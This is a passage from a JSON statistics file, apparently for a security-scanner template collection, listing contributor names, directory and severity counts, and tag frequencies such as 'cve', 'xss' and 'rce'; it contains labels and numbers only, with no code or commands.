(@cristivlad25)","count":2},{"name":"0xcrypto","count":2},{"name":"luci","count":2},{"name":"korteke","count":2},{"name":"gevakun","count":2},{"name":"raesene","count":2},{"name":"danielmofer","count":2},{"name":"hackerarpan","count":2},{"name":"parth","count":2},{"name":"dheerajmadhukar","count":2},{"name":"z0ne","count":2},{"name":"kiblyn11","count":2},{"name":"0xprial","count":2},{"name":"ajaysenr","count":2},{"name":"mohammedsaneem","count":2},{"name":"kishore-hariram","count":2},{"name":"randomdhiraj","count":2},{"name":"gal nagli","count":2},{"name":"sascha brendel","count":2},{"name":"nuk3s3c","count":2},{"name":"maximus decimus","count":2},{"name":"k11h-de","count":2},{"name":"moritz nentwig","count":2},{"name":"joeldeleep","count":2},{"name":"joshua rogers","count":2},{"name":"j3ssie","count":2},{"name":"smaranchand","count":2},{"name":"nkxxkn","count":2},{"name":"0xnirvana","count":2},{"name":"pxmme1337","count":2},{"name":"c3l3si4n","count":2},{"name":"ynnirc","count":1},{"name":"1nf1n7y","count":1},{"name":"ahmed sherif","count":1},{"name":"zy9ard3","count":1},{"name":"yuansec","count":1},{"name":"dhiyaneshdki","count":1},{"name":"supr4s","count":1},{"name":"mrcl0wnlab","count":1},{"name":"lrtk-coder","count":1},{"name":"elouhi","count":1},{"name":"revblock","count":1},{"name":"unp4ck","count":1},{"name":"jcockhren","count":1},{"name":"alevsk","count":1},{"name":"oscarintherocks","count":1},{"name":"dali","count":1},{"name":"deena","count":1},{"name":"exid","count":1},{"name":"aayush vishnoi","count":1},{"name":"marcos_iaf","count":1},{"name":"0xd0ff9","count":1},{"name":"rotembar","count":1},{"name":"y0no","count":1},{"name":"mukundbhuva","count":1},{"name":"xshuden","count":1},{"name":"pudsec","count":1},{"name":"aron molnar","count":1},{"name":"akash.c","count":1},{"name":"mabdullah22","count":1},{"name":"nytr0gen","count":1},{"name":"flag007","count":1},{"name":"kiks7","count":1},{"name":"mihhailsokolov","count":1},{"name":"majidmc2","count":1},{"name":"anon-artist","count":1},{"name":"kagamigawa","count":1},{"name":"lixts","count":1},{"name":"jteles","count":1},{"name":"hczdmr","count":1},{"name":"ndmalc","count":1},{"name":"fq_hsu","count":1},{"name":"af001","count":1},{"name":"thebinitghimire","count":1},{"name":"jbertman","count":1},{"name":"kareemse1im","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"danigoland","count":1},{"name":"yashgoti","count":1},{"name":"borna nematzadeh","count":1},{"name":"keni0k","count":1},{"name":"husain","count":1},{"name":"osamahamad","count":1},{"name":"alex","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"ransomsec","count":1},{"name":"patrick pirker","count":1},{"name":"booboohq","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"vzamanillo","count":1},{"name":"exploitation","count":1},{"name":"skylark-lab","count":1},{"name":"gtrrnr","count":1},{"name":"opencirt","count":1},{"name":"hanlaomo","count":1},{"name":"rubina119","count":1},{"name":"juicypotato1","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"furkansayim","count":1},{"name":"allenwest24","count":1},{"name":"mzack9999","count":1},{"name":"chron0x","count":1},{"name":"gboddin","count":1},{"name":"noobexploiter","count":1},{"name":"elmahdi","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"sak1","count":1},{"name":"amnotacat","count":1},{"name":"ofjaaah","count":1},{"name":"jrolf","count":1},{"name":"iampritam","count":1},{"name":"paper-pen","count":1},{"name":"patralos","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"becivells","count":1},{"name":"co0nan","count":1},{"name":"_harleo","count":1},{"name":"ahmed abou-ela","count":1},{"name":"th3.d1p4k","count":1},{"name":"wabafet","count":1},{"name":"xstp","count":1},{"name":"intx0x80","count":1},{"name":"alperenkesk","count":1},{"name":"calumjelrick","count":1},{"name":"zhenwarx","count":1},{"name":"vinit989","count":1},{"name":"s1r1u5_","count":1},{"name":"pry0cc","count":1},{"name":"jiheon-dev","count":1},{"name":"jeya.seelan","count":1},{"name":"tirtha_mandal","count":1},{"name":"mubassirpatel","count":1},{"name":"iphantasmic","count":1},{"name":"kiransau","count":1},{"name":"narluin","count":1},{"name":"tea","count":1},{"name":"whynotke","count":1},{"name":"d0rkerdevil","count":1},{"name":"orpheus","count":1},{"name":"rschio","count":1},{"name":"_darrenmartyn","count":1},{"name":"hardik-rathod","count":1},{"name":"makyotox","count":1},{"name":"remonsec","count":1},{"name":"harshinsecurity","count":1},{"name":"nerrorsec","count":1},{"name":"blckraven","count":1},{"name":"5up3r541y4n","count":1},{"name":"p-l-","count":1},{"name":"breno_css","count":1},{"name":"akshansh","count":1},{"name":"arall","count":1},{"name":"clment cruchet","count":1},{"name":"rodnt","count":1},{"name":"ptonewreckin","count":1},{"name":"thelicato","count":1},{"name":"piyushchhiroliya","count":1},{"name":"omarkurt","count":1},{"name":"nielsing","count":1},{"name":"r3nz0","count":1},{"name":"evolutionsec","count":1},{"name":"ooooooo_q","count":1},{"name":"arr0way","count":1},{"name":"xeldax","count":1},{"name":"queencitycyber","count":1},{"name":"b4uh0lz","count":1},{"name":"jaskaran","count":1},{"name":"mhdsamx","count":1},{"name":"tirtha","count":1},{"name":"caon","count":1},{"name":"izn0u","count":1},{"name":"compr00t","count":1},{"name":"jaimin gondaliya","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"shiva (strobes security)","count":1},{"name":"affix","count":1},{"name":"schniggie","count":1},{"name":"dmartyn","count":1},{"name":"brabbit10","count":1},{"name":"undefl0w","count":1},{"name":"aringo","count":1},{"name":"manuelbua","count":1},{"name":"tehtbl","count":1},{"name":"petergrifin","count":1},{"name":"retr02332","count":1},{"name":"rojanrijal","count":1},{"name":"ayadim","count":1},{"name":"phyr3wall","count":1},{"name":"noamrathaus","count":1},{"name":"sinsinology","count":1},{"name":"f1she3","count":1},{"name":"esonhugh","count":1},{"name":"omarjezi","count":1},{"name":"manasmbellani","count":1},{"name":"ok_bye_now","count":1},{"name":"luqman","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"0ut0fb4nd","count":1},{"name":"duty_1g","count":1},{"name":"adrianmf","count":1},{"name":"apt-mirror","count":1},{"name":"regala_","count":1},{"name":"secthebit","count":1},{"name":"geraldino2","count":1},{"name":"juliosmelo","count":1},{"name":"ola456","count":1},{"name":"bugvsme","count":1},{"name":"nobody","count":1},{"name":"bughuntersurya","count":1},{"name":"sleepingbag945","count":1},{"name":"aresx","count":1},{"name":"charanrayudu","count":1},{"name":"djoevanka","count":1},{"name":"lamscun","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"th3r4id","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"un-fmunozs","count":1},{"name":"soyelmago","count":1},{"name":"retr0","count":1},{"name":"michael wedl","count":1},{"name":"couskito","count":1},{"name":"pascalheidmann","count":1},{"name":"udyz","count":1},{"name":"jeya seelan","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"zsusac","count":1},{"name":"alexrydzak","count":1},{"name":"0xceba","count":1},{"name":"momen eldawakhly","count":1},{"name":"toufik-airane","count":1},{"name":"luqmaan hadia","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"mantissts","count":1},{"name":"realexp3rt","count":1},{"name":"spac3wh1te","count":1},{"name":"dievus","count":1},{"name":"lark lab","count":1},{"name":"andysvints","count":1},{"name":"yashanand155","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"h4kux","count":1},{"name":"tarunkoyalwar","count":1},{"name":"pussycat0","count":1},{"name":"miroslavsotak","count":1},{"name":"shreyapohekar","count":1},{"name":"x6263","count":1},{"name":"aaronchen0","count":1},{"name":"colbyjack1134","count":1},{"name":"shifacyclewla","count":1},{"name":"andirrahmani1","count":1},{"name":"galoget","count":1},{"name":"imhunterand","count":1},{"name":"hakluke","count":1},{"name":"palanichamy_perumal","count":1},{"name":"jonathanwalker","count":1},{"name":"marcio mendes","count":1},{"name":"ayadi","count":1},{"name":"infosecsanyam","count":1},{"name":"bad5ect0r","count":1},{"name":"_c0wb0y_","count":1},{"name":"ipanda","count":1},{"name":"sicksec","count":1},{"name":"shelld3v","count":1},{"name":"zandros0","count":1},{"name":"shockwave","count":1},{"name":"lingtren","count":1},{"name":"carrot2","count":1},{"name":"jbaines-r7","count":1},{"name":"elder tao","count":1},{"name":"0h1in9e","count":1},{"name":"rivalsec","count":1},{"name":"kchason","count":1},{"name":"official_blackhat13","count":1},{"name":"noraj","count":1},{"name":"metascan","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"freakyclown","count":1},{"name":"dabla","count":1},{"name":"pdp","count":1},{"name":"kailashbohara","count":1},{"name":"ramondunker","count":1},{"name":"natto97","count":1},{"name":"ilovebinbash","count":1},{"name":"b0rn2r00t","count":1},{"name":"liquidsec","count":1},{"name":"bjhulst","count":1},{"name":"mass0ma","count":1},{"name":"mr. bobo hp","count":1},{"name":"j33n1k4","count":1},{"name":"mbmy","count":1},{"name":"myst7ic","count":1},{"name":"zeyad azima","count":1},{"name":"barthy.koeln","count":1},{"name":"qlkwej","count":1},{"name":"miryangjung","count":1},{"name":"sherlocksecurity","count":1},{"name":"8authur","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"francescocarlucci","count":1},{"name":"ph33rr","count":1},{"name":"zinminphy0","count":1},{"name":"daffianfo","count":1},{"name":"lethargynavigator","count":1},{"name":"exceed","count":1},{"name":"igibanez","count":1},{"name":"hazana","count":1},{"name":"houdinis","count":1},{"name":"nuts7","count":1},{"name":"mah3sec_","count":1},{"name":"kaizensecurity","count":1},{"name":"bywalks","count":1},{"name":"0xh7ml","count":1},{"name":"micha3lb3n","count":1},{"name":"justmumu","count":1},{"name":"viniciuspereiras","count":1},{"name":"fmunozs","count":1},{"name":"droberson","count":1},{"name":"amanrawat","count":1},{"name":"petruknisme","count":1},{"name":"hakimkt","count":1},{"name":"bartu utku sarp","count":1},{"name":"jc175","count":1},{"name":"nagli","count":1},{"name":"pjborah","count":1},{"name":"kr1shna4garwal","count":1},{"name":"evan rubinstien","count":1},{"name":"mariam tariq","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"naglis","count":1},{"name":"cookiehanhoan","count":1},{"name":"am0nt31r0","count":1},{"name":"open-sec","count":1},{"name":"viondexd","count":1},{"name":"shivampand3y","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"act1on3","count":1},{"name":"akokonunes","count":1},{"name":"2rs3c","count":1},{"name":"carlosvieira","count":1},{"name":"failopen","count":1},{"name":"ahmetpergamum","count":1},{"name":"notsoevilweasel","count":1},{"name":"knassar702","count":1},{"name":"therealtoastycat","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"dale clarke","count":1},{"name":"erethon","count":1},{"name":"luskabol","count":1},{"name":"ringo","count":1},{"name":"furkansenan","count":1},{"name":"w0tx","count":1},{"name":"sickwell","count":1},{"name":"0xceeb","count":1},{"name":"fopina","count":1},{"name":"0xtavian","count":1},{"name":"stupidfish","count":1},{"name":"unkl4b","count":1},{"name":"davidfegyver","count":1},{"name":"wlayzz","count":1},{"name":"gpiechnik2","count":1},{"name":"higor melgaço","count":1},{"name":"httpvoid","count":1},{"name":"push4d","count":1},{"name":"absshax","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"tim_koopmans","count":1},{"name":"elitebaz","count":1},{"name":"b0yd","count":1},{"name":"ling","count":1},{"name":"philippdelteil","count":1},{"name":"kabirsuda","count":1},{"name":"udinchan","count":1},{"name":"0xteles","count":1},{"name":"berkdusunur","count":1},{"name":"dk999","count":1},{"name":"jub0bs","count":1},{"name":"irshadahamed","count":1},{"name":"jna1","count":1},{"name":"ggranjus","count":1},{"name":"ldionmarcil","count":1},{"name":"sec_hawk","count":1},{"name":"dwbzn","count":1},{"name":"topscoder","count":1},{"name":"willd96","count":1},{"name":"thevillagehacker","count":1},{"name":"florianmaak","count":1},{"name":"kurohost","count":1},{"name":"ramkrishna sawant","count":1},{"name":"rotemreiss","count":1},{"name":"prettyboyaaditya","count":1},{"name":"dawid-czarnecki","count":1},{"name":"0xrod","count":1},{"name":"ohlinge","count":1},{"name":"daviey","count":1},{"name":"xcapri","count":1},{"name":"screamy","count":1},{"name":"pratik khalane","count":1},{"name":"hexcat","count":1},{"name":"jas37","count":1},{"name":"arjunchandarana","count":1},{"name":"sshell","count":1},{"name":"mesaglio","count":1},{"name":"shiar","count":1}],"directory":[{"name":"http","count":5970},{"name":"workflows","count":190},{"name":"file","count":130},{"name":"network","count":98},{"name":"ssl","count":24},{"name":"dns","count":18},{"name":"headless","count":9},{"name":"contributors.json","count":1},{"name":"cves.json","count":1},{"name":"TEMPLATES-STATS.json","count":1}],"severity":[{"name":"info","count":2907},{"name":"high","count":1298},{"name":"medium","count":1076},{"name":"critical","count":717},{"name":"low","count":224},{"name":"unknown","count":27}],"types":[{"name":"file","count":130},{"name":"dns","count":18}]} +{"tags":[{"name":"cve","count":1949},{"name":"panel","count":958},{"name":"wordpress","count":802},{"name":"exposure","count":719},{"name":"xss","count":695},{"name":"wp-plugin","count":691},{"name":"osint","count":652},{"name":"tech","count":618},{"name":"edb","count":598},{"name":"lfi","count":558},{"name":"misconfig","count":474},{"name":"cve2021","count":434},{"name":"rce","count":430},{"name":"cve2022","count":417},{"name":"packetstorm","count":369},{"name":"wpscan","count":350},{"name":"wp","count":303},{"name":"unauth","count":285},{"name":"cve2020","count":242},{"name":"token-spray","count":240},{"name":"authenticated","count":233},{"name":"sqli","count":210},{"name":"top-200","count":208},{"name":"osint-social","count":207},{"name":"kev","count":200},{"name":"config","count":197},{"name":"","count":194},{"name":"oast","count":171},{"name":"token","count":160},{"name":"apache","count":153},{"name":"cve2018","count":151},{"name":"default-login","count":150},{"name":"iot","count":150},{"name":"cve2019","count":149},{"name":"file","count":147},{"name":"login","count":140},{"name":"joomla","count":136},{"name":"redirect","count":116},{"name":"cve2023","count":116},{"name":"cve2010","count":112},{"name":"files","count":101},{"name":"top-100","count":100},{"name":"network","count":100},{"name":"router","count":97},{"name":"ssrf","count":96},{"name":"cms","count":95},{"name":"auth-bypass","count":81},{"name":"devops","count":77},{"name":"cve2017","count":77},{"name":"takeover","count":73},{"name":"intrusive","count":72},{"name":"install","count":70},{"name":"disclosure","count":68},{"name":"oracle","count":65},{"name":"seclists","count":60},{"name":"detect","count":58},{"name":"oss","count":57},{"name":"cve2015","count":54},{"name":"google","count":53},{"name":"cisco","count":53},{"name":"cve2016","count":52},{"name":"adobe","count":52},{"name":"fileupload","count":49},{"name":"atlassian","count":47},{"name":"logs","count":46},{"name":"tenable","count":46},{"name":"vmware","count":45},{"name":"osint-gaming","count":45},{"name":"aem","count":44},{"name":"vulhub","count":44},{"name":"debug","count":44},{"name":"plugin","count":43},{"name":"osint-porn","count":42},{"name":"cve2014","count":42},{"name":"hackerone","count":42},{"name":"osint-hobby","count":42},{"name":"huntr","count":41},{"name":"generic","count":37},{"name":"traversal","count":37},{"name":"springboot","count":36},{"name":"jira","count":36},{"name":"kubernetes","count":35},{"name":"aws","count":35},{"name":"osint-misc","count":35},{"name":"injection","count":34},{"name":"listing","count":33},{"name":"deserialization","count":31},{"name":"misc","count":31},{"name":"osint-coding","count":29},{"name":"sap","count":29},{"name":"cnvd","count":29},{"name":"log4j","count":28},{"name":"osint-tech","count":28},{"name":"gitlab","count":27},{"name":"php","count":27},{"name":"microsoft","count":26},{"name":"proxy","count":26},{"name":"jndi","count":25},{"name":"cve2012","count":25},{"name":"fuzz","count":25},{"name":"api","count":25},{"name":"osint-shopping","count":24},{"name":"osint-images","count":24},{"name":"firewall","count":24},{"name":"osint-finance","count":24},{"name":"manageengine","count":24},{"name":"osint-business","count":24},{"name":"zoho","count":23},{"name":"stored-xss","count":23},{"name":"amazon","count":23},{"name":"k8s","count":23},{"name":"c2","count":23},{"name":"wp-theme","count":22},{"name":"tomcat","count":21},{"name":"cloud","count":21},{"name":"msf","count":21},{"name":"ibm","count":21},{"name":"weblogic","count":21},{"name":"fortinet","count":20},{"name":"cicd","count":20},{"name":"jenkins","count":19},{"name":"rukovoditel","count":19},{"name":"github","count":19},{"name":"ssl","count":19},{"name":"camera","count":19},{"name":"dns","count":19},{"name":"struts","count":19},{"name":"admin","count":19},{"name":"dlink","count":19},{"name":"lfr","count":18},{"name":"osint-music","count":18},{"name":"wavlink","count":18},{"name":"ftp","count":18},{"name":"service","count":18},{"name":"ir","count":17},{"name":"cve2011","count":17},{"name":"nginx","count":16},{"name":"cve2009","count":16},{"name":"osint-blog","count":16},{"name":"xxe","count":16},{"name":"printer","count":16},{"name":"backup","count":16},{"name":"magento","count":15},{"name":"cve2008","count":15},{"name":"citrix","count":15},{"name":"status","count":15},{"name":"java","count":15},{"name":"hp","count":15},{"name":"android","count":15},{"name":"audit","count":14},{"name":"osint-health","count":14},{"name":"woocommerce","count":14},{"name":"zyxel","count":14},{"name":"confluence","count":14},{"name":"cve2013","count":14},{"name":"nodejs","count":14},{"name":"domainmod","count":14},{"name":"jboss","count":14},{"name":"osint-art","count":14},{"name":"mail","count":14},{"name":"osint-dating","count":13},{"name":"login-check","count":13},{"name":"laravel","count":13},{"name":"tokens","count":13},{"name":"abstractapi","count":13},{"name":"npm","count":13},{"name":"azure","count":13},{"name":"osint-political","count":13},{"name":"fortigate","count":13},{"name":"creds-stuffing","count":13},{"name":"cuppa","count":13},{"name":"airflow","count":12},{"name":"drupal","count":12},{"name":"enum","count":12},{"name":"rails","count":12},{"name":"ruby","count":12},{"name":"vpn","count":12},{"name":"git","count":12},{"name":"auth","count":12},{"name":"netgear","count":12},{"name":"grafana","count":12},{"name":"microweber","count":12},{"name":"webserver","count":12},{"name":"ruijie","count":12},{"name":"netsweeper","count":12},{"name":"graphql","count":12},{"name":"backdoor","count":12},{"name":"kafka","count":12},{"name":"dashboard","count":12},{"name":"online-fire-reporting","count":11},{"name":"phpmyadmin","count":11},{"name":"xstream","count":11},{"name":"cnvd2021","count":11},{"name":"coldfusion","count":11},{"name":"cisa","count":11},{"name":"dell","count":11},{"name":"osint-video","count":11},{"name":"sonicwall","count":11},{"name":"setup","count":11},{"name":"docker","count":11},{"name":"ssh","count":10},{"name":"ssti","count":10},{"name":"symfony","count":10},{"name":"headless","count":10},{"name":"thinkphp","count":10},{"name":"django","count":10},{"name":"digitalocean","count":10},{"name":"jolokia","count":10},{"name":"solarview","count":10},{"name":"spring","count":10},{"name":"zimbra","count":10},{"name":"dedecms","count":10},{"name":"db","count":10},{"name":"glpi","count":10},{"name":"zabbix","count":9},{"name":"firebase","count":9},{"name":"wso2","count":9},{"name":"alibaba","count":9},{"name":"windows","count":9},{"name":"installer","count":9},{"name":"prometheus","count":9},{"name":"versa","count":9},{"name":"opencats","count":9},{"name":"node","count":9},{"name":"bypass","count":9},{"name":"pfsense","count":9},{"name":"redis","count":9},{"name":"gitea","count":9},{"name":"cache","count":9},{"name":"iis","count":9},{"name":"kube","count":9},{"name":"sitecore","count":9},{"name":"vcenter","count":9},{"name":"scada","count":9},{"name":"fastjson","count":9},{"name":"osint-news","count":9},{"name":"ecology","count":8},{"name":"metadata","count":8},{"name":"hms","count":8},{"name":"oauth","count":8},{"name":"elasticsearch","count":8},{"name":"spotweb","count":8},{"name":"crlf","count":8},{"name":"keys","count":8},{"name":"icewarp","count":8},{"name":"default-page","count":8},{"name":"emerge","count":8},{"name":"config-audit","count":8},{"name":"recon","count":8},{"name":"vbulletin","count":8},{"name":"unauthenticated","count":8},{"name":"smtp","count":8},{"name":"jetbrains","count":8},{"name":"cisco-switch","count":8},{"name":"console","count":8},{"name":"bucket","count":8},{"name":"ognl","count":8},{"name":"mirai","count":8},{"name":"exchange","count":8},{"name":"atom","count":8},{"name":"solr","count":8},{"name":"cnvd2020","count":8},{"name":"druid","count":8},{"name":"odoo","count":7},{"name":"samsung","count":7},{"name":"fortios","count":7},{"name":"shopify","count":7},{"name":"nagiosxi","count":7},{"name":"sophos","count":7},{"name":"websphere","count":7},{"name":"avtech","count":7},{"name":"huawei","count":7},{"name":"vms","count":7},{"name":"go","count":7},{"name":"manager","count":7},{"name":"nagios","count":7},{"name":"squirrelmail","count":7},{"name":"ofbiz","count":7},{"name":"ec2","count":7},{"name":"blind","count":7},{"name":"seeyon","count":7},{"name":"error","count":7},{"name":"gogs","count":7},{"name":"maps","count":7},{"name":"malware","count":7},{"name":"lucee","count":6},{"name":"artica","count":6},{"name":"magmi","count":6},{"name":"elfinder","count":6},{"name":"liferay","count":6},{"name":"minio","count":6},{"name":"jetty","count":6},{"name":"jamf","count":6},{"name":"mongodb","count":6},{"name":"bigip","count":6},{"name":"microstrategy","count":6},{"name":"s3","count":6},{"name":"newrelic","count":6},{"name":"activemq","count":6},{"name":"keycloak","count":6},{"name":"solarwinds","count":6},{"name":"jeecg","count":6},{"name":"nexus","count":6},{"name":"kubelet","count":6},{"name":"symantec","count":6},{"name":"filemanager","count":6},{"name":"opensis","count":6},{"name":"slack","count":6},{"name":"database","count":6},{"name":"tikiwiki","count":6},{"name":"cobbler","count":6},{"name":"pmb","count":6},{"name":"rconfig","count":6},{"name":"secret","count":6},{"name":"plesk","count":6},{"name":"moodle","count":6},{"name":"python","count":6},{"name":"leak","count":6},{"name":"doctor-appointment-system","count":6},{"name":"openvpn","count":6},{"name":"fpd","count":6},{"name":"zhiyuan","count":6},{"name":"asana","count":5},{"name":"hikvision","count":5},{"name":"firmware","count":5},{"name":"hashicorp","count":5},{"name":"facebook","count":5},{"name":"akamai","count":5},{"name":"cacti","count":5},{"name":"square","count":5},{"name":"awstats","count":5},{"name":"circarlife","count":5},{"name":"vrealize","count":5},{"name":"microfocus","count":5},{"name":"rseenet","count":5},{"name":"typo3","count":5},{"name":"74cms","count":5},{"name":"apisix","count":5},{"name":"server","count":5},{"name":"heroku","count":5},{"name":"adminer","count":5},{"name":"openemr","count":5},{"name":"rfi","count":5},{"name":"prestashop","count":5},{"name":"gocd","count":5},{"name":"paypal","count":5},{"name":"hybris","count":5},{"name":"parallels","count":5},{"name":"geoserver","count":5},{"name":"nacos","count":5},{"name":"kkfileview","count":5},{"name":"elastic","count":5},{"name":"cockpit","count":5},{"name":"resin","count":5},{"name":"sql","count":5},{"name":"caucho","count":5},{"name":"strapi","count":5},{"name":"metinfo","count":5},{"name":"fatpipe","count":5},{"name":"asp","count":5},{"name":"storage","count":5},{"name":"carrental","count":5},{"name":"avaya","count":5},{"name":"avideo","count":5},{"name":"ruckus","count":5},{"name":"dropbear","count":4},{"name":"mailchimp","count":4},{"name":"nosqli","count":4},{"name":"centos","count":4},{"name":"sonarqube","count":4},{"name":"kentico","count":4},{"name":"stripe","count":4},{"name":"seagate","count":4},{"name":"flink","count":4},{"name":"mostracms","count":4},{"name":"pentaho","count":4},{"name":"prtg","count":4},{"name":"hpe","count":4},{"name":"pixie","count":4},{"name":"couchdb","count":4},{"name":"photo","count":4},{"name":"redmine","count":4},{"name":"cloudflare","count":4},{"name":"age-encryption","count":4},{"name":"codeigniter","count":4},{"name":"oa","count":4},{"name":"grav","count":4},{"name":"kibana","count":4},{"name":"umbraco","count":4},{"name":"goanywhere","count":4},{"name":"bmc","count":4},{"name":"powerjob","count":4},{"name":"sendgrid","count":4},{"name":"aura","count":4},{"name":"ldap","count":4},{"name":"mostra","count":4},{"name":"arcgis","count":4},{"name":"jellyfin","count":4},{"name":"cnvd2019","count":4},{"name":"nextjs","count":4},{"name":"ampache","count":4},{"name":"qdpm","count":4},{"name":"linkerd","count":4},{"name":"yeswiki","count":4},{"name":"postmessage","count":4},{"name":"phpinfo","count":4},{"name":"horde","count":4},{"name":"concrete","count":4},{"name":"javascript","count":4},{"name":"osint-archived","count":4},{"name":"candidats","count":4},{"name":"xmlrpc","count":4},{"name":"httpserver","count":4},{"name":"mikrotik","count":4},{"name":"froxlor","count":4},{"name":"zte","count":4},{"name":"gnuboard","count":4},{"name":"wcs","count":4},{"name":"royalevent","count":4},{"name":"puppet","count":4},{"name":"httpd","count":4},{"name":"terramaster","count":4},{"name":"panos","count":4},{"name":"hoteldruid","count":4},{"name":"search","count":4},{"name":"roxy","count":4},{"name":"tenda","count":4},{"name":"elementor","count":4},{"name":"tls","count":4},{"name":"artifactory","count":4},{"name":"kevinlab","count":4},{"name":"webshell","count":4},{"name":"telesquare","count":4},{"name":"openfire","count":4},{"name":"axigen","count":4},{"name":"aspose","count":4},{"name":"mlflow","count":4},{"name":"mautic","count":4},{"name":"thinkcmf","count":4},{"name":"pie-register","count":4},{"name":"springcloud","count":4},{"name":"voip","count":4},{"name":"sangfor","count":4},{"name":"bitbucket","count":4},{"name":"zend","count":4},{"name":"jupyter","count":4},{"name":"ems","count":4},{"name":"log","count":4},{"name":"telerik","count":4},{"name":"newstatpress","count":4},{"name":"ebs","count":4},{"name":"rabbitmq","count":4},{"name":"consul","count":4},{"name":"webmin","count":4},{"name":"dolibarr","count":4},{"name":"express","count":4},{"name":"spark","count":4},{"name":"beyondtrust","count":4},{"name":"phppgadmin","count":4},{"name":"hongdian","count":4},{"name":"churchcrm","count":4},{"name":"cve2007","count":4},{"name":"mysql","count":4},{"name":"cve2005","count":4},{"name":"kfm","count":3},{"name":"blockchain","count":3},{"name":"yonyou","count":3},{"name":"jeesns","count":3},{"name":"adafruit","count":3},{"name":"rlm","count":3},{"name":"axis","count":3},{"name":"sharepoint","count":3},{"name":"hsphere","count":3},{"name":"totolink","count":3},{"name":"movable","count":3},{"name":"clusterengine","count":3},{"name":"rocketchat","count":3},{"name":"actuator","count":3},{"name":"postman","count":3},{"name":"synology","count":3},{"name":"carel","count":3},{"name":"cnvd2022","count":3},{"name":"labkey","count":3},{"name":"key","count":3},{"name":"angular","count":3},{"name":"pypi","count":3},{"name":"xerox","count":3},{"name":"pega","count":3},{"name":"waf","count":3},{"name":"samba","count":3},{"name":"eshop","count":3},{"name":"modem","count":3},{"name":"superadmin","count":3},{"name":"dreambox","count":3},{"name":"lotus","count":3},{"name":"targa","count":3},{"name":"jwt","count":3},{"name":"mantisbt","count":3},{"name":"cas","count":3},{"name":"globalprotect","count":3},{"name":"zeroshell","count":3},{"name":"webadmin","count":3},{"name":"processwire","count":3},{"name":"pyload","count":3},{"name":"securepoint","count":3},{"name":"sony","count":3},{"name":"unifi","count":3},{"name":"aria","count":3},{"name":"rancher","count":3},{"name":"postgresql","count":3},{"name":"jfrog","count":3},{"name":"figma","count":3},{"name":"ampps","count":3},{"name":"geowebserver","count":3},{"name":"smb","count":3},{"name":"forum","count":3},{"name":"voipmonitor","count":3},{"name":"trendnet","count":3},{"name":"backdrop","count":3},{"name":"buffalo","count":3},{"name":"mobileiron","count":3},{"name":"aptus","count":3},{"name":"epson","count":3},{"name":"poms","count":3},{"name":"teamcity","count":3},{"name":"axis2","count":3},{"name":"netlify","count":3},{"name":"digitalrebar","count":3},{"name":"nuuo","count":3},{"name":"rubygems","count":3},{"name":"empirecms","count":3},{"name":"sugarcrm","count":3},{"name":"password","count":3},{"name":"telegram","count":3},{"name":"chamilo","count":3},{"name":"graylog","count":3},{"name":"influxdb","count":3},{"name":"steve","count":3},{"name":"r-seenet","count":3},{"name":"twitter","count":3},{"name":"lansweeper","count":3},{"name":"cluster","count":3},{"name":"zerof","count":3},{"name":"loytec","count":3},{"name":"kingsoft","count":3},{"name":"rackn","count":3},{"name":"fileman","count":3},{"name":"kavita","count":3},{"name":"telnet","count":3},{"name":"credential","count":3},{"name":"bigant","count":3},{"name":"octobercms","count":3},{"name":"webalizer","count":3},{"name":"webcam","count":3},{"name":"splunk","count":3},{"name":"dos","count":3},{"name":"purchase-order-management-system","count":3},{"name":"trixbox","count":3},{"name":"harbor","count":3},{"name":"thinfinity","count":3},{"name":"openbmcs","count":3},{"name":"3cx","count":3},{"name":"linux","count":3},{"name":"asus","count":3},{"name":"matrix","count":3},{"name":"ueditor","count":3},{"name":"dubbo","count":3},{"name":"drawio","count":3},{"name":"etcd","count":3},{"name":"redash","count":3},{"name":"dom","count":3},{"name":"fanwei","count":3},{"name":"netdata","count":3},{"name":"monstra","count":3},{"name":"saltstack","count":3},{"name":"ivanti","count":3},{"name":"fanruan","count":3},{"name":"pip","count":3},{"name":"bitrix","count":3},{"name":"nuget","count":3},{"name":"metersphere","count":3},{"name":"wbce","count":3},{"name":"gateway","count":3},{"name":"apollo","count":3},{"name":"nortek","count":3},{"name":"webkul-qloapps","count":3},{"name":"airtable","count":3},{"name":"discourse","count":3},{"name":"getsimple","count":3},{"name":"subrion","count":3},{"name":"dzzoffice","count":3},{"name":"panabit","count":3},{"name":"dotcms","count":3},{"name":"intercom","count":3},{"name":"glassfish","count":3},{"name":"mcafee","count":3},{"name":"pulsar","count":3},{"name":"wordfence","count":3},{"name":"flexvnf","count":3},{"name":"selea","count":3},{"name":"selenium","count":3},{"name":"shiro","count":3},{"name":"ansible","count":3},{"name":"linksys","count":3},{"name":"proftpd","count":3},{"name":"sitemap","count":3},{"name":"sysaid","count":3},{"name":"segment","count":3},{"name":"rat","count":3},{"name":"mapbox","count":3},{"name":"sftp","count":3},{"name":"mongo","count":3},{"name":"tableau","count":3},{"name":"axway","count":3},{"name":"purchase-order","count":3},{"name":"webmail","count":3},{"name":"listserv","count":3},{"name":"circleci","count":3},{"name":"mailgun","count":3},{"name":"openai","count":3},{"name":"sentry","count":3},{"name":"magnolia","count":3},{"name":"nuxtjs","count":3},{"name":"payara","count":3},{"name":"spip","count":3},{"name":"temenos","count":3},{"name":"messaging","count":3},{"name":"swagger","count":3},{"name":"openam","count":3},{"name":"idrac","count":3},{"name":"lighttpd","count":3},{"name":"fuelcms","count":3},{"name":"weiphp","count":3},{"name":"gradle","count":3},{"name":"brut